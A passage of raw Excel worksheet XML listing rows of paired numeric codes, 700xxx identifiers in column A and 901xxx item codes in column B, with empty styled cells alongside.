    </row>
    <row r="1247" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1247" s="5">
        <v>700154</v>
      </c>
      <c r="B1247" s="3">
        <v>901083</v>
      </c>
      <c r="D1247" s="5"/>
      <c r="E1247" s="3"/>
      <c r="F1247" s="1"/>
      <c r="H1247" s="1"/>
    </row>
    <row r="1248" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1248" s="5">
        <v>700154</v>
      </c>
      <c r="B1248" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D1248" s="5"/>
      <c r="E1248" s="3"/>
      <c r="F1248" s="1"/>
      <c r="H1248" s="1"/>
    </row>
    <row r="1249" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1249" s="5">
        <v>700154</v>
      </c>
      <c r="B1249" s="3">
        <v>901070.00600000005</v>
      </c>
      <c r="D1249" s="5"/>
      <c r="E1249" s="3"/>
      <c r="F1249" s="1"/>
      <c r="H1249" s="1"/>
    </row>
    <row r="1250" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1250" s="5">
        <v>700154</v>
      </c>
      <c r="B1250" s="3">
        <v>901105</v>
      </c>
      <c r="D1250" s="5"/>
      <c r="E1250" s="3"/>
      <c r="F1250" s="1"/>
      <c r="H1250" s="1"/>
    </row>
    <row r="1251" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1251" s="5">
        <v>700154</v>
      </c>
      <c r="B1251" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1251" s="5"/>
      <c r="E1251" s="3"/>
      <c r="F1251" s="1"/>
      <c r="H1251" s="1"/>
    </row>
    <row r="1252" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1252" s="5">
        <v>700154</v>
      </c>
      <c r="B1252" s="3">
        <v>901112</v>
      </c>
      <c r="D1252" s="5"/>
      <c r="E1252" s="3"/>
      <c r="F1252" s="1"/>
      <c r="H1252" s="1"/>
    </row>
    <row r="1253" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1253" s="5">
        <v>700154</v>
      </c>
      <c r="B1253" s="3">
        <v>901106</v>
      </c>
      <c r="D1253" s="5"/>
      <c r="E1253" s="3"/>
      <c r="F1253" s="1"/>
      <c r="H1253" s="1"/>
    </row>
    <row r="1254" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1254" s="5">
        <v>700154</v>
      </c>
      <c r="B1254" s="3">
        <v>901046</v>
      </c>
      <c r="D1254" s="5"/>
      <c r="E1254" s="3"/>
      <c r="F1254" s="1"/>
      <c r="H1254" s="1"/>
    </row>
    <row r="1255" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1255" s="5">
        <v>700154</v>
      </c>
      <c r="B1255" s="3">
        <v>901135</v>
      </c>
      <c r="D1255" s="5"/>
      <c r="E1255" s="3"/>
      <c r="F1255" s="1"/>
      <c r="H1255" s="1"/>
    </row>
    <row r="1256" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1256" s="5">
        <v>700154</v>
      </c>
      <c r="B1256" s="3">
        <v>901095</v>
      </c>
      <c r="D1256" s="5"/>
      <c r="E1256" s="3"/>
      <c r="F1256" s="1"/>
      <c r="H1256" s="1"/>
    </row>
    <row r="1257" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1257" s="5">
        <v>700154</v>
      </c>
      <c r="B1257" s="3">
        <v>901027</v>
      </c>
      <c r="D1257" s="5"/>
      <c r="E1257" s="3"/>
      <c r="F1257" s="1"/>
      <c r="H1257" s="1"/>
    </row>
    <row r="1258" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1258" s="5">
        <v>700154</v>
      </c>
      <c r="B1258" s="3">
        <v>901027.005</v>
      </c>
      <c r="D1258" s="5"/>
      <c r="E1258" s="3"/>
      <c r="F1258" s="1"/>
      <c r="H1258" s="1"/>
    </row>
    <row r="1259" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1259" s="5">
        <v>700154</v>
      </c>
      <c r="B1259" s="3">
        <v>901137.00100000005</v>
      </c>
      <c r="D1259" s="5"/>
      <c r="E1259" s="3"/>
      <c r="F1259" s="1"/>
      <c r="H1259" s="1"/>
    </row>
    <row r="1260" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1260" s="5">
        <v>700154</v>
      </c>
      <c r="B1260" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D1260" s="5"/>
      <c r="E1260" s="3"/>
      <c r="F1260" s="1"/>
      <c r="H1260" s="1"/>
    </row>
    <row r="1261" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1261" s="5">
        <v>700154</v>
      </c>
      <c r="B1261" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D1261" s="5"/>
      <c r="E1261" s="3"/>
      <c r="F1261" s="1"/>
      <c r="H1261" s="1"/>
    </row>
    <row r="1262" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1262" s="5">
        <v>700154</v>
      </c>
      <c r="B1262" s="3">
        <v>901057</v>
      </c>
      <c r="D1262" s="5"/>
      <c r="E1262" s="3"/>
      <c r="F1262" s="1"/>
      <c r="H1262" s="1"/>
    </row>
    <row r="1263" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1263" s="5">
        <v>700154</v>
      </c>
      <c r="B1263" s="3">
        <v>901055</v>
      </c>
      <c r="D1263" s="5"/>
      <c r="E1263" s="3"/>
      <c r="F1263" s="1"/>
      <c r="H1263" s="1"/>
    </row>
    <row r="1264" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1264" s="5">
        <v>700154</v>
      </c>
      <c r="B1264" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D1264" s="5"/>
      <c r="E1264" s="3"/>
      <c r="F1264" s="1"/>
      <c r="H1264" s="1"/>
    </row>
    <row r="1265" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1265" s="5">
        <v>700154</v>
      </c>
      <c r="B1265" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D1265" s="5"/>
      <c r="E1265" s="3"/>
      <c r="F1265" s="1"/>
      <c r="H1265" s="1"/>
    </row>
    <row r="1266" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1266" s="5">
        <v>700154</v>
      </c>
      <c r="B1266" s="3">
        <v>901572</v>
      </c>
      <c r="D1266" s="5"/>
      <c r="E1266" s="3"/>
      <c r="F1266" s="1"/>
      <c r="H1266" s="1"/>
    </row>
    <row r="1267" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1267" s="5">
        <v>700154</v>
      </c>
      <c r="B1267" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D1267" s="5"/>
      <c r="E1267" s="3"/>
      <c r="F1267" s="1"/>
      <c r="H1267" s="1"/>
    </row>
    <row r="1268" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1268" s="5">
        <v>700154</v>
      </c>
      <c r="B1268" s="3">
        <v>901090.00399999996</v>
      </c>
      <c r="D1268" s="5"/>
      <c r="E1268" s="3"/>
      <c r="F1268" s="1"/>
      <c r="H1268" s="1"/>
    </row>
    <row r="1269" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1269" s="5">
        <v>700154</v>
      </c>
      <c r="B1269" s="3">
        <v>901012</v>
      </c>
      <c r="D1269" s="5"/>
      <c r="E1269" s="3"/>
      <c r="F1269" s="1"/>
      <c r="H1269" s="1"/>
    </row>
    <row r="1270" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1270" s="5">
        <v>700154</v>
      </c>
      <c r="B1270" s="3">
        <v>901620</v>
      </c>
      <c r="D1270" s="5"/>
      <c r="E1270" s="3"/>
      <c r="F1270" s="1"/>
      <c r="H1270" s="1"/>
    </row>
    <row r="1271" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1271" s="5">
        <v>700154</v>
      </c>
      <c r="B1271" s="3">
        <v>901021.00100000005</v>
      </c>
      <c r="D1271" s="5"/>
      <c r="E1271" s="3"/>
      <c r="F1271" s="1"/>
      <c r="H1271" s="1"/>
    </row>
    <row r="1272" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1272" s="5">
        <v>700154</v>
      </c>
      <c r="B1272" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D1272" s="5"/>
      <c r="E1272" s="3"/>
      <c r="F1272" s="1"/>
      <c r="H1272" s="1"/>
    </row>
    <row r="1273" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1273" s="5">
        <v>700154</v>
      </c>
      <c r="B1273" s="3">
        <v>901021.00300000003</v>
      </c>
      <c r="D1273" s="5"/>
      <c r="E1273" s="3"/>
      <c r="F1273" s="1"/>
      <c r="H1273" s="1"/>
    </row>
    <row r="1274" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1274" s="5">
        <v>700154</v>
      </c>
      <c r="B1274" s="3">
        <v>901021.00399999996</v>
      </c>
      <c r="D1274" s="5"/>
      <c r="E1274" s="3"/>
      <c r="F1274" s="1"/>
      <c r="H1274" s="1"/>
    </row>
    <row r="1275" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1275" s="5">
        <v>700154</v>
      </c>
      <c r="B1275" s="3">
        <v>901021.00600000005</v>
      </c>
      <c r="D1275" s="5"/>
      <c r="E1275" s="3"/>
      <c r="F1275" s="1"/>
      <c r="H1275" s="1"/>
    </row>
    <row r="1276" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1276" s="5">
        <v>700154</v>
      </c>
      <c r="B1276" s="3">
        <v>901018</v>
      </c>
      <c r="D1276" s="5"/>
      <c r="E1276" s="3"/>
      <c r="F1276" s="1"/>
      <c r="H1276" s="1"/>
    </row>
    <row r="1277" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1277" s="5">
        <v>700154</v>
      </c>
      <c r="B1277" s="3">
        <v>901029</v>
      </c>
      <c r="D1277" s="5"/>
      <c r="E1277" s="3"/>
      <c r="F1277" s="1"/>
      <c r="H1277" s="1"/>
    </row>
    <row r="1278" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1278" s="5">
        <v>700154</v>
      </c>
      <c r="B1278" s="3">
        <v>901113</v>
      </c>
      <c r="D1278" s="5"/>
      <c r="E1278" s="3"/>
      <c r="F1278" s="1"/>
      <c r="H1278" s="1"/>
    </row>
    <row r="1279" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1279" s="5">
        <v>700154</v>
      </c>
      <c r="B1279" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D1279" s="5"/>
      <c r="E1279" s="3"/>
      <c r="F1279" s="1"/>
      <c r="H1279" s="1"/>
    </row>
    <row r="1280" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1280" s="5">
        <v>700154</v>
      </c>
      <c r="B1280" s="3">
        <v>901518</v>
      </c>
      <c r="D1280" s="5"/>
      <c r="E1280" s="3"/>
      <c r="F1280" s="1"/>
      <c r="H1280" s="1"/>
    </row>
    <row r="1281" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1281" s="5">
        <v>700154</v>
      </c>
      <c r="B1281" s="3">
        <v>901553.00199999998</v>
      </c>
      <c r="D1281" s="5"/>
      <c r="E1281" s="3"/>
      <c r="F1281" s="1"/>
      <c r="H1281" s="1"/>
    </row>
    <row r="1282" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1282" s="5">
        <v>700154</v>
      </c>
      <c r="B1282" s="3">
        <v>901016</v>
      </c>
      <c r="D1282" s="5"/>
      <c r="E1282" s="3"/>
      <c r="F1282" s="1"/>
      <c r="H1282" s="1"/>
    </row>
    <row r="1283" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1283" s="5">
        <v>700154</v>
      </c>
      <c r="B1283" s="3">
        <v>901007</v>
      </c>
      <c r="D1283" s="5"/>
      <c r="E1283" s="3"/>
      <c r="F1283" s="1"/>
      <c r="H1283" s="1"/>
    </row>
    <row r="1284" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1284" s="5">
        <v>700154</v>
      </c>
      <c r="B1284" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D1284" s="5"/>
      <c r="E1284" s="3"/>
      <c r="F1284" s="1"/>
      <c r="H1284" s="1"/>
    </row>
    <row r="1285" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1285" s="5">
        <v>700154</v>
      </c>
      <c r="B1285" s="3">
        <v>901550.00199999998</v>
      </c>
      <c r="D1285" s="5"/>
      <c r="E1285" s="3"/>
      <c r="F1285" s="1"/>
      <c r="H1285" s="1"/>
    </row>
    <row r="1286" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1286" s="5">
        <v>700154</v>
      </c>
      <c r="B1286" s="3">
        <v>901078.00199999998</v>
      </c>
      <c r="D1286" s="5"/>
      <c r="E1286" s="3"/>
      <c r="F1286" s="1"/>
      <c r="H1286" s="1"/>
    </row>
    <row r="1287" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1287" s="5">
        <v>700154</v>
      </c>
      <c r="B1287" s="3">
        <v>901047</v>
      </c>
      <c r="D1287" s="5"/>
      <c r="E1287" s="3"/>
      <c r="F1287" s="1"/>
      <c r="H1287" s="1"/>
    </row>
    <row r="1288" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1288" s="5">
        <v>700338</v>
      </c>
      <c r="B1288" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D1288" s="5"/>
      <c r="E1288" s="3"/>
      <c r="F1288" s="1"/>
      <c r="H1288" s="1"/>
    </row>
    <row r="1289" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1289" s="5">
        <v>700338</v>
      </c>
      <c r="B1289" s="3">
        <v>901123</v>
      </c>
      <c r="D1289" s="5"/>
      <c r="E1289" s="3"/>
      <c r="F1289" s="1"/>
      <c r="H1289" s="1"/>
    </row>
    <row r="1290" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1290" s="5">
        <v>700338</v>
      </c>
      <c r="B1290" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1290" s="5"/>
      <c r="E1290" s="3"/>
      <c r="F1290" s="1"/>
      <c r="H1290" s="1"/>
    </row>
    <row r="1291" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1291" s="5">
        <v>700338</v>
      </c>
      <c r="B1291" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1291" s="5"/>
      <c r="E1291" s="3"/>
      <c r="F1291" s="1"/>
      <c r="H1291" s="1"/>
    </row>
    <row r="1292" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1292" s="5">
        <v>700338</v>
      </c>
      <c r="B1292" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D1292" s="5"/>
      <c r="E1292" s="3"/>
      <c r="F1292" s="1"/>
      <c r="H1292" s="1"/>
    </row>
    <row r="1293" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1293" s="5">
        <v>700338</v>
      </c>
      <c r="B1293" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1293" s="5"/>
      <c r="E1293" s="3"/>
      <c r="F1293" s="1"/>
      <c r="H1293" s="1"/>
    </row>
    <row r="1294" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1294" s="5">
        <v>700338</v>
      </c>
      <c r="B1294" s="3">
        <v>901113</v>
      </c>
      <c r="D1294" s="5"/>
      <c r="E1294" s="3"/>
      <c r="F1294" s="1"/>
      <c r="H1294" s="1"/>
    </row>
    <row r="1295" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1295" s="5">
        <v>700338</v>
      </c>
      <c r="B1295" s="3">
        <v>901125</v>
      </c>
      <c r="D1295" s="5"/>
      <c r="E1295" s="3"/>
      <c r="F1295" s="1"/>
      <c r="H1295" s="1"/>
    </row>
    <row r="1296" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1296" s="5">
        <v>700369</v>
      </c>
      <c r="B1296" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1296" s="5"/>
      <c r="E1296" s="3"/>
      <c r="F1296" s="1"/>
      <c r="H1296" s="1"/>
    </row>
    <row r="1297" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1297" s="5">
        <v>700369</v>
      </c>
      <c r="B1297" s="3">
        <v>901059.00399999996</v>
      </c>
      <c r="D1297" s="5"/>
      <c r="E1297" s="3"/>
      <c r="F1297" s="1"/>
      <c r="H1297" s="1"/>
    </row>
    <row r="1298" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1298" s="5">
        <v>700369</v>
      </c>
      <c r="B1298" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D1298" s="5"/>
      <c r="E1298" s="3"/>
      <c r="F1298" s="1"/>
      <c r="H1298" s="1"/>
    </row>
    <row r="1299" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1299" s="5">
        <v>700369</v>
      </c>
      <c r="B1299" s="3">
        <v>901543.00100000005</v>
      </c>
      <c r="D1299" s="5"/>
      <c r="E1299" s="3"/>
      <c r="F1299" s="1"/>
      <c r="H1299" s="1"/>
    </row>
    <row r="1300" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1300" s="5">
        <v>700369</v>
      </c>
      <c r="B1300" s="3">
        <v>901140</v>
      </c>
      <c r="D1300" s="5"/>
      <c r="E1300" s="3"/>
      <c r="F1300" s="1"/>
      <c r="H1300" s="1"/>
    </row>
    <row r="1301" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1301" s="5">
        <v>700369</v>
      </c>
      <c r="B1301" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D1301" s="5"/>
      <c r="E1301" s="3"/>
      <c r="F1301" s="1"/>
      <c r="H1301" s="1"/>
    </row>
    <row r="1302" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1302" s="5">
        <v>700369</v>
      </c>
      <c r="B1302" s="3">
        <v>901105</v>
      </c>
      <c r="D1302" s="5"/>
      <c r="E1302" s="3"/>
      <c r="F1302" s="1"/>
      <c r="H1302" s="1"/>
    </row>
    <row r="1303" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1303" s="5">
        <v>700369</v>
      </c>
      <c r="B1303" s="3">
        <v>901027</v>
      </c>
      <c r="D1303" s="5"/>
      <c r="E1303" s="3"/>
      <c r="F1303" s="1"/>
      <c r="H1303" s="1"/>
    </row>
    <row r="1304" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1304" s="5">
        <v>700369</v>
      </c>
      <c r="B1304" s="3">
        <v>901553.00100000005</v>
      </c>
      <c r="D1304" s="5"/>
      <c r="E1304" s="3"/>
      <c r="F1304" s="1"/>
      <c r="H1304" s="1"/>
    </row>
    <row r="1305" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1305" s="5">
        <v>700244</v>
      </c>
      <c r="B1305" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D1305" s="5"/>
      <c r="E1305" s="3"/>
      <c r="F1305" s="1"/>
      <c r="H1305" s="1"/>
    </row>
    <row r="1306" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1306" s="5">
        <v>700244</v>
      </c>
      <c r="B1306" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1306" s="5"/>
      <c r="E1306" s="3"/>
      <c r="F1306" s="1"/>
      <c r="H1306" s="1"/>
    </row>
    <row r="1307" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1307" s="5">
        <v>700244</v>
      </c>
      <c r="B1307" s="3">
        <v>901119</v>
      </c>
      <c r="D1307" s="5"/>
      <c r="E1307" s="3"/>
      <c r="F1307" s="1"/>
      <c r="H1307" s="1"/>
    </row>
    <row r="1308" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1308" s="5">
        <v>700244</v>
      </c>
      <c r="B1308" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1308" s="5"/>
      <c r="E1308" s="3"/>
      <c r="F1308" s="1"/>
      <c r="H1308" s="1"/>
    </row>
    <row r="1309" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1309" s="5">
        <v>700244</v>
      </c>
      <c r="B1309" s="3">
        <v>901547.00899999996</v>
      </c>
      <c r="D1309" s="5"/>
      <c r="E1309" s="3"/>
      <c r="F1309" s="1"/>
      <c r="H1309" s="1"/>
    </row>
    <row r="1310" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1310" s="5">
        <v>700244</v>
      </c>
      <c r="B1310" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1310" s="5"/>
      <c r="E1310" s="3"/>
      <c r="F1310" s="1"/>
      <c r="H1310" s="1"/>
    </row>
    <row r="1311" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1311" s="5">
        <v>700244</v>
      </c>
      <c r="B1311" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1311" s="5"/>
      <c r="E1311" s="3"/>
      <c r="F1311" s="1"/>
      <c r="H1311" s="1"/>
    </row>
    <row r="1312" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1312" s="5">
        <v>700244</v>
      </c>
      <c r="B1312" s="3">
        <v>901027</v>
      </c>
      <c r="D1312" s="5"/>
      <c r="E1312" s="3"/>
      <c r="F1312" s="1"/>
      <c r="H1312" s="1"/>
    </row>
    <row r="1313" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1313" s="5">
        <v>700244</v>
      </c>
      <c r="B1313" s="3">
        <v>901027.00100000005</v>
      </c>
      <c r="D1313" s="5"/>
      <c r="E1313" s="3"/>
      <c r="F1313" s="1"/>
      <c r="H1313" s="1"/>
    </row>
    <row r="1314" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1314" s="5">
        <v>700244</v>
      </c>
      <c r="B1314" s="3">
        <v>901057</v>
      </c>
      <c r="D1314" s="5"/>
      <c r="E1314" s="3"/>
      <c r="F1314" s="1"/>
      <c r="H1314" s="1"/>
    </row>
    <row r="1315" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1315" s="5">
        <v>700244</v>
      </c>
      <c r="B1315" s="3">
        <v>901018</v>
      </c>
      <c r="D1315" s="5"/>
      <c r="E1315" s="3"/>
      <c r="F1315" s="1"/>
      <c r="H1315" s="1"/>
    </row>
    <row r="1316" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1316" s="5">
        <v>700244</v>
      </c>
      <c r="B1316" s="3">
        <v>901218.01100000006</v>
      </c>
      <c r="D1316" s="5"/>
      <c r="E1316" s="3"/>
      <c r="F1316" s="1"/>
      <c r="H1316" s="1"/>
    </row>
    <row r="1317" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1317" s="5">
        <v>700244</v>
      </c>
      <c r="B1317" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1317" s="5"/>
      <c r="E1317" s="3"/>
      <c r="F1317" s="1"/>
      <c r="H1317" s="1"/>
    </row>
    <row r="1318" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1318" s="5">
        <v>700244</v>
      </c>
      <c r="B1318" s="3">
        <v>901082</v>
      </c>
      <c r="D1318" s="5"/>
      <c r="E1318" s="3"/>
      <c r="F1318" s="1"/>
      <c r="H1318" s="1"/>
    </row>
    <row r="1319" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1319" s="5">
        <v>700244</v>
      </c>
      <c r="B1319" s="3">
        <v>901016</v>
      </c>
      <c r="D1319" s="5"/>
      <c r="E1319" s="3"/>
      <c r="F1319" s="1"/>
      <c r="H1319" s="1"/>
    </row>
    <row r="1320" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1320" s="5">
        <v>700244</v>
      </c>
      <c r="B1320" s="3">
        <v>901049</v>
      </c>
      <c r="D1320" s="5"/>
      <c r="E1320" s="3"/>
      <c r="F1320" s="1"/>
      <c r="H1320" s="1"/>
    </row>
    <row r="1321" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1321" s="5">
        <v>700244</v>
      </c>
      <c r="B1321" s="3">
        <v>901007</v>
      </c>
      <c r="D1321" s="5"/>
      <c r="E1321" s="3"/>
      <c r="F1321" s="1"/>
      <c r="H1321" s="1"/>
    </row>
    <row r="1322" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1322" s="5">
        <v>700244</v>
      </c>
      <c r="B1322" s="3">
        <v>901102.00199999998</v>
      </c>
      <c r="D1322" s="5"/>
      <c r="E1322" s="3"/>
      <c r="F1322" s="1"/>
      <c r="H1322" s="1"/>
    </row>
    <row r="1323" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1323" s="5">
        <v>700126</v>
      </c>
      <c r="B1323" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1323" s="5"/>
      <c r="E1323" s="3"/>
      <c r="F1323" s="1"/>
      <c r="H1323" s="1"/>
    </row>
    <row r="1324" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1324" s="5">
        <v>700126</v>
      </c>
      <c r="B1324" s="3">
        <v>901071.00300000003</v>
      </c>
      <c r="D1324" s="5"/>
      <c r="E1324" s="3"/>
      <c r="F1324" s="1"/>
      <c r="H1324" s="1"/>
    </row>
    <row r="1325" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1325" s="5">
        <v>700126</v>
      </c>
      <c r="B1325" s="3">
        <v>901059.00100000005</v>
      </c>
      <c r="D1325" s="5"/>
      <c r="E1325" s="3"/>
      <c r="F1325" s="1"/>
      <c r="H1325" s="1"/>
    </row>
    <row r="1326" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1326" s="5">
        <v>700126</v>
      </c>
      <c r="B1326" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1326" s="5"/>
      <c r="E1326" s="3"/>
      <c r="F1326" s="1"/>
      <c r="H1326" s="1"/>
    </row>
    <row r="1327" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1327" s="5">
        <v>700126</v>
      </c>
      <c r="B1327" s="3">
        <v>901140</v>
      </c>
      <c r="D1327" s="5"/>
      <c r="E1327" s="3"/>
      <c r="F1327" s="1"/>
      <c r="H1327" s="1"/>
    </row>
    <row r="1328" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1328" s="5">
        <v>700126</v>
      </c>
      <c r="B1328" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D1328" s="5"/>
      <c r="E1328" s="3"/>
      <c r="F1328" s="1"/>
      <c r="H1328" s="1"/>
    </row>
    <row r="1329" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1329" s="5">
        <v>700126</v>
      </c>
      <c r="B1329" s="3">
        <v>901546.01500000001</v>
      </c>
      <c r="D1329" s="5"/>
      <c r="E1329" s="3"/>
      <c r="F1329" s="1"/>
      <c r="H1329" s="1"/>
    </row>
    <row r="1330" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1330" s="5">
        <v>700126</v>
      </c>
      <c r="B1330" s="3">
        <v>901564.005</v>
      </c>
      <c r="D1330" s="5"/>
      <c r="E1330" s="3"/>
      <c r="F1330" s="1"/>
      <c r="H1330" s="1"/>
    </row>
    <row r="1331" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1331" s="5">
        <v>700126</v>
      </c>
      <c r="B1331" s="3">
        <v>901036.00399999996</v>
      </c>
      <c r="D1331" s="5"/>
      <c r="E1331" s="3"/>
      <c r="F1331" s="1"/>
      <c r="H1331" s="1"/>
    </row>
    <row r="1332" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1332" s="5">
        <v>700126</v>
      </c>
      <c r="B1332" s="3">
        <v>901112</v>
      </c>
      <c r="D1332" s="5"/>
      <c r="E1332" s="3"/>
      <c r="F1332" s="1"/>
      <c r="H1332" s="1"/>
    </row>
    <row r="1333" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1333" s="5">
        <v>700126</v>
      </c>
      <c r="B1333" s="3">
        <v>901106</v>
      </c>
      <c r="D1333" s="5"/>
      <c r="E1333" s="3"/>
      <c r="F1333" s="1"/>
      <c r="H1333" s="1"/>
    </row>
    <row r="1334" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1334" s="5">
        <v>700126</v>
      </c>
      <c r="B1334" s="3">
        <v>901027</v>
      </c>
      <c r="D1334" s="5"/>
      <c r="E1334" s="3"/>
      <c r="F1334" s="1"/>
      <c r="H1334" s="1"/>
    </row>
    <row r="1335" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1335" s="5">
        <v>700126</v>
      </c>
      <c r="B1335" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D1335" s="5"/>
      <c r="E1335" s="3"/>
      <c r="F1335" s="1"/>
      <c r="H1335" s="1"/>
    </row>
    <row r="1336" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1336" s="5">
        <v>700126</v>
      </c>
      <c r="B1336" s="3">
        <v>901012</v>
      </c>
      <c r="D1336" s="5"/>
      <c r="E1336" s="3"/>
      <c r="F1336" s="1"/>
      <c r="H1336" s="1"/>
    </row>
    <row r="1337" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1337" s="5">
        <v>700126</v>
      </c>
      <c r="B1337" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1337" s="5"/>
      <c r="E1337" s="3"/>
      <c r="F1337" s="1"/>
      <c r="H1337" s="1"/>
    </row>
    <row r="1338" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1338" s="5">
        <v>700126</v>
      </c>
      <c r="B1338" s="3">
        <v>901029</v>
      </c>
      <c r="D1338" s="5"/>
      <c r="E1338" s="3"/>
      <c r="F1338" s="1"/>
      <c r="H1338" s="1"/>
    </row>
    <row r="1339" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1339" s="5">
        <v>700126</v>
      </c>
      <c r="B1339" s="3">
        <v>901518</v>
      </c>
      <c r="D1339" s="5"/>
      <c r="E1339" s="3"/>
      <c r="F1339" s="1"/>
      <c r="H1339" s="1"/>
    </row>
    <row r="1340" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1340" s="5">
